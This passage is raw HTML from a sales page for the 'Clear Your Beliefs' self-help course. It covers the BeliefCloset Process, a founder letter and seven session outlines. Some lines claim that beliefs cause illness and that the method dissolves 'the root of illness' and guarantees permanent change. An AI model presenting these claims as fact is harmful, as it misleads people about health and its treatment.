beliefs.</strong></p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn''t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.</p>\n<p>&nbsp;</p>\n<h1>Upgrade Your Human Operating System</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.</p>\n<p>Negative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong></p>\n\n<strong><em>I''m not enough.</em></strong>\n<strong><em>I can''t do it.</em></strong>\n<strong><em>I''m not worthy.</em></strong>\n<strong><strong><em>I''ll never be like them.</em></strong></strong>\n<strong><em>I''m all alone.</em></strong>\n\n<strong><em>I need to do more (or better) to be accepted.</em></strong>\n<strong><em>There''s something wrong with me.</em></strong>\n<strong><em>I''m fundamentally flawed.</em></strong>\n<strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong>\n<strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong>\n\n<p>These beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.</p>\n<p>At the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.</p>\n<p><strong>Here''s the good news:</strong> <strong>Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</strong></p>\n<p>&nbsp;</p>\n<h1>The Garden Of Your Mind</h1>\n<p style="text-align: left"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px;margin-right: 20px" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\n<p>The same thing is true in your subconscious mind:</p>\n<p><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></p>\n<p><strong>It''s that simple.</strong></p>\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n\n<p style="text-align: left">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left"><img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\n<p>When you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong></p>\n\n<p>A shift at the core of the psyche expands out like a pebble''s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong></p>\n\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n\n<p><strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.</p>\n\n<p><em><strong>How you view others </strong></em>is colored by your beliefs about them.</p>\n\n<p><img class=" wp-image-322 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" /><strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.</p>\n\n<p>Change the lens of your beliefs, and you''ll change <strong>both</strong> your perception <strong>and</strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong></p>\n\n<p><strong> It''s that simple.</strong></p>\n\n<p>&nbsp;</p>\n<h1>Why Beliefs Are Difficult To Change</h1>\n\n<p>Many people agree that, <em>"Your beliefs create your reality," </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There''s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.</p>\n\n<p><strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.</p>\n\n<p>Your parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn''t know any better. it''s exactly what <em>their parents</em> did to<em> them</em>.</p>\n\n<p>You formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."</p>\n\n<p>&nbsp;</p>\n<h1>Why We React The Way We Do</h1>\n\n<p>When you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:</p>\n\n<p><img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" /></p>\n\n<p>\n</p>\nWhy did I say that?\nWhat''s wrong with me?\nWhy didn''t I follow through?\nWhy did I react that way?\nWhat the hell just happened?\n\n<p><em></p>\n\n<p>"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.</p>\n\n<p>These programs are like mousetraps in your mind''s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.</p>\n\n<p><strong>You can change these reactive patterns – if you''re willing to clean out your basement.</strong></p>\n\n<p>&nbsp;</p>\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n\n<p><strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?</p>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. </p>\n\n<p><strong>Here''s why:</strong></p>\n\n<strong>Affirmations</strong> are new beliefs you want to install. You can say them all day long, but they don''t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.\n<strong>That Belief Isn''t True.</strong>  Many methods help you recognize that an old belief isn''t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.\n<strong>Tap Your Problem Away. </strong> Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.\n\n<p>Most belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn''t you! The problem is with the method – it was only partially effective!</strong></p>\n\n<p>&nbsp;</p>\n<h1>Here''s Some Good News</h1>\n\n<strong><strong><strong>First: It''s not your fault. There''s nothing wrong with you.</strong></strong></strong>\n<strong>Second: You can change your beliefs <em>permanently</em>.</strong>\n\n<p>To get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they''ll pop up later and create the same problem – again and again.</p>\n\n<p>You can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.</p>\n\n<h1>Imagine The Life You Desire</h1>\n\n<p><strong>Can you imagine this?</strong></p>\n<p><img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" /></p>\n<p>You''re no longer held back by old beliefs and stories.</p>\n<p>There''s no resistance to doing what needs to be done.</p>\n<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n<p>&nbsp;</p>\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n\n<p><strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong></p>\n\n<p><img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em></p>\n\n<p>Those discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.</p>\n\n<p><em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong></p>\n<p>&nbsp;</p>\n<h1>Clear Whatever Is In The Way</h1>\n\n<p><img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don''t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.</p>\n\n<p><strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don''t</em> want.</strong></p>\n\n<p>&nbsp;</p>\n<h1>Is This A Guaranteed Cure-All?</h1>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.</p>\n\n<p>No technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.</p>\n\n<p>During the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.</p>\n\n<p>&nbsp;</p>\n<h1>The Clear Your Beliefs program can:</h1>\n\nEliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.\nRemove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.\nGive you the power to change your experiences – and your circumstances – at will.\nShow you how to gain mastery over your moods, perceptions, and responses.\n\n<p>&nbsp;</p>\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.</p>\n\n<p>If you''re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em></p>\n\n<p>During each class, you''ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You''ll upgrade your health, your work, and your relationships. You''ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.</p>\n\n<p>If you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.</p>\n\n<h1>With This Methodology, You Can Finally:</h1>\n\nManifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a>\nRemove resistance and barriers\nOpen doors to new opportunities\nEliminate pain and suffering from the past\nExperience more fulfillment in your relationships\nAttract more abundance and prosperity\nIncrease your energy, vitality, and productivity\n\n<p><strong>You''ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).</p>\n\n<p>&nbsp;</p>\n\n<h1>A Message from Lion Goodman...</h1>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>\n<p>Dear Explorer:</p>\n<p>As a child, I believed there was something wrong with me. I didn''t look or feel like the other kids. I didn''t like who I was. I felt separate and alone. I didn''t know how to make it better.</p>\n<p>I was gripped by some of life''s biggest questions: "Who am I? Why am I here? What makes me different? What is life about?"</p>\n<p>I began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the "normal" part never happened!)</p>\n<p>After decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.</p>\n<p>I noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it''s possibilities, new opportunities came my way.</p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px;margin-bottom: 5px" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.</p>\n<p>The belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a "download" – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.</p>\n<p>When your closet is crammed full of old outfits you''ll never wear, it''s time for some Spring cleaning!</p>\n<p><em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong></p>\n<p>Having worked with thousands of clients over the past decade, I''ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I''ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven''t touched.</p>\n<p>I am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.</p>\n<p>If you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.</p>\n<p>A lot of people say, "just change your beliefs..." as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.</p>\n<p>In the <em>Clear Your Beliefs</em> course, you''ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.</p>\n<p>This is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.</p>\n<p>Live the life of your dreams. There''s nothing to stop you – except a few old beliefs...</p>\n<p>In gratitude, and with warm wishes for your total success,</p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a></p>\n<p>Lion Goodman, Creator of <em>The BeliefCloset Process</em></p>\n\n<p>&nbsp;</p>\n<h1>Register Today and Discover What''s Possible</h1>\n\n<p>We are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You''ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.</p>\n\n<p>&nbsp;</p>\n\n<h5>Session 1:   <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.</p>\n<p>In this first session, you''ll examine your old beliefs, and determine which ones no longer serve you.  It''s time to discard them and clear some space!  You''ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You''ll feel more open, empowered and free to choose your beliefs and the way you live your life.</p>\n\n<p><strong> In Session 1, you will:</strong></p>\n\nDiscover old limiting beliefs that are deeply buried in your subconscious mind\nLearn which ones keep you stuck, preventing you from having what you want in life\nExperience a process that returns you to your True Self, the home of inner joy and bliss\nBegin to work with, not against, your subconscious mind – where your beliefs reside\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 2:   <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you''ll focus on issues and problems that have kept you from being happy and joyful.</p>\n<p>What do you believe about yourself? Your idea of "Who I am" is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It''s time to haul them out, and toss them out! You don''t need them anymore.  If you hear critical inner voices berating you, don''t miss this session.  Rid yourself of those pesky critical voices along with the diapers!</p>\n\n<p><strong> In Session 2, you will:</strong></p>\n\nUse the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself\nClear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again\nSee your own magnificence through a new clear lens of your own beauty and joy\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 3:  <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.</p>\n<p>This isn''t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.</p>\n<p><em>What are you capable of?  </em>If your answer is "Anything..." you don''t need this session.  But most of us think too small...</p>\n\n<p>Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>"What''s the use?  You''ll fail anyway. You don''t deserve happiness – look at you!"  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.</p>\n\nDo you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you''ll eliminate those beliefs and relieve yourself of those symptoms. You''re already a master manifestor – you''re just manifesting your old programs!\n\n<p><strong> In Session 3, you will:</strong></p>\n\nIdentify old beliefs that stand between you and creating the life you want\nDissolve the old beliefs that get in your way over and over, or make you quit when you''re partway there.\nImagine what it means to live without self-imposed limitations, trusting that you can create anything you want\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 4:   <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you''ll delete beliefs that interfere with your personal relationships.</p>\n<p>If you''re married, are you happy and secure?   Or are you anxious about the future?   If you''re not in a relationship, what''s holding you back from finding your ideal mate?</p>\n<p>Humans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned "what love is" from your parents – so it''s no wonder that you''re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad''s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.</p>\n\n<p>&nbsp;</p>\n\n<p><strong> In Session 4, you will:</strong></p>\n\nLook deeply into the childhood patterns that enabled you to survive and thrive\nSee which of your beliefs now interfere with your intimate relationships\nDiscover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 5:   <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you''ll focus on money, wealth and abundance – or the lack thereof!</p>\n<p>What do you believe about earning a living in today''s economy?   Is money really the root of all evil?</p>\n<p>If you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?</p>\n\n<p><strong> In Session 5, you will:</strong></p>\n\nExamine your family and cultural beliefs about money, work, poverty and "deservingness."\nRemove beliefs that create stumbling blocks in the way of natural abundance\nCreate new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve\nLearn why affirmations alone, and the "Law of Attraction," don''t work, regardless of how diligently you practice them\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 6:   <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you''ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.</p>\n<p>Ill health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?</p>\n\n<p><strong> In Session 6, you will:</strong></p>\n\nIdentify old beliefs that stand between you and vibrant health\nRecognize beliefs that make you vulnerable to disease and injury\nDissolve old beliefs at the root of illness, bad habits and lifestyle stress\nImagine the healthy, vibrant body you want, and create it consciously with new beliefs\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 7:   <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you''ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.</p>\n<p>You''ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.</p>\n<p>When you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you''ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.</p>\n\n<p><strong> In Session 7, you will:</strong></p>\n\nScan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live\nLearn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life\nFind your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are\n\n<p></p>\n<p>&nbsp;</p>\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\n<p>In addition to these seven transformational sessions, you''ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.</p>\n<p>&nbsp;</p>\n\nBonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can''t seem to stop hurting each other. What''s going on?</p>\n<p>Lion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)</p>\n<p>Carista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We''re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.</p>\n<p>Learn how to determine your own (and your partner''s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI''s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #2 <strong>- The LoveStyle Profile Quiz </strong>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you''ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong>\n\n<p><img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" 